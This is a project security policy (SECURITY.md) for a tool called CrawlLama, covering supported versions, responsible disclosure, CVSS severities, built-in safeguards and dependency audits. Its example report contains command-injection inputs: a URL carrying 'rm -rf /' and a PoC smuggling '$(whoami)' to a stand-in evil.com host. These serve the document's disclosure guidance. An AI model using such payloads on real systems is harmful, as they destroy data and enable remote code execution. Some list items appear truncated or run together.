| 📚 Navigation: README | Contributing | Docs | Changelog |
The security of CrawlLama is important to us. If you discover a vulnerability, please report it responsibly.
We provide security updates for the following versions:
| Version | Supported |
|---|---|
| 1.4.x | :white_check_mark: |
| 1.3.x | :x: |
| 1.2.x | :x: |
| < 1.2 | :x: |
Do NOT create public GitHub Issues for vulnerabilities. This could put other users at risk.
Please report vulnerabilities responsibly via:
[SECURITY] Short DescriptionPlease provide as many details as possible:
Example:
**Vulnerability:** Command Injection in page_reader.py
**Version:** v1.3.0
**Description:**
The function `fetch_page()` in `tools/page_reader.py` does not properly validate user input, which can lead to command injection.
**Steps:**
1. Start CrawlLama
2. Enter the following URL: `http://example.com; rm -rf /`
3. Command is executed on the system
**Impact:**
Remote Code Execution (RCE) as the user running CrawlLama
**PoC:**
```python
from tools.page_reader import fetch_page
fetch_page("http://evil.com$(whoami)")
Suggestion:
URL validation with validators.url() before processing
We strive for the following response times:
We use the CVSS v3.1 scoring system:
| Severity | CVSS Score | Examples |
|---|---|---|
| Critical | 9.0-10.0 | RCE, Authentication Bypass |
| High | 7.0-8.9 | SQL Injection, XSS |
| Medium | 4.0-6.9 | CSRF, Information Disclosure |
| Low | 0.1-3.9 | Minor Information Leaks |
CrawlLama is designed for local operation. If exposed publicly (e.g. via FastAPI):
⚠️ Important Security Measures:
security.rate_limit)Mitigation:
data/blacklist.txt)Mitigation:
core/hallu_detect.py)We monitor dependencies regularly:
# Check dependencies
pip-audit
safety check
# Or with our script
python scripts/check_dependencies.py
Automatic updates: Dependabot is enabled and creates PRs for security updates.
CrawlLama has the following built-in security features:
# utils/validators.py
validate_url() # Check URL format
validate_query() # Check query length/content
sanitize_output() # Clean LLM output
# config.json
"security": {
"rate_limit": 1.0, # Requests per second
"check_robots_txt": true
}
# data/blacklist.txt
# Blocks known malicious domains
malware-site.com
phishing-domain.net
# API keys are stored encrypted
from utils.secure_config import SecureConfig
config = SecureConfig()
config.set_key("api_key", "secret") # Encrypted
# Plugins run in a separate namespace
# No access to sensitive data
.env for API keyslogs/app.log regularlyvalidators.py for all inputs.envpip-audit before every releasepip-audit shows no critical/high vulnerabilities.env.example contains only placeholdersAfter fixing a vulnerability:
We thank the following security researchers for responsible disclosure:
No reports yet - be the first!
Currently, we have no official bug bounty program.
However, we honor all security reports with:
Thank you for helping keep CrawlLama secure! 🔒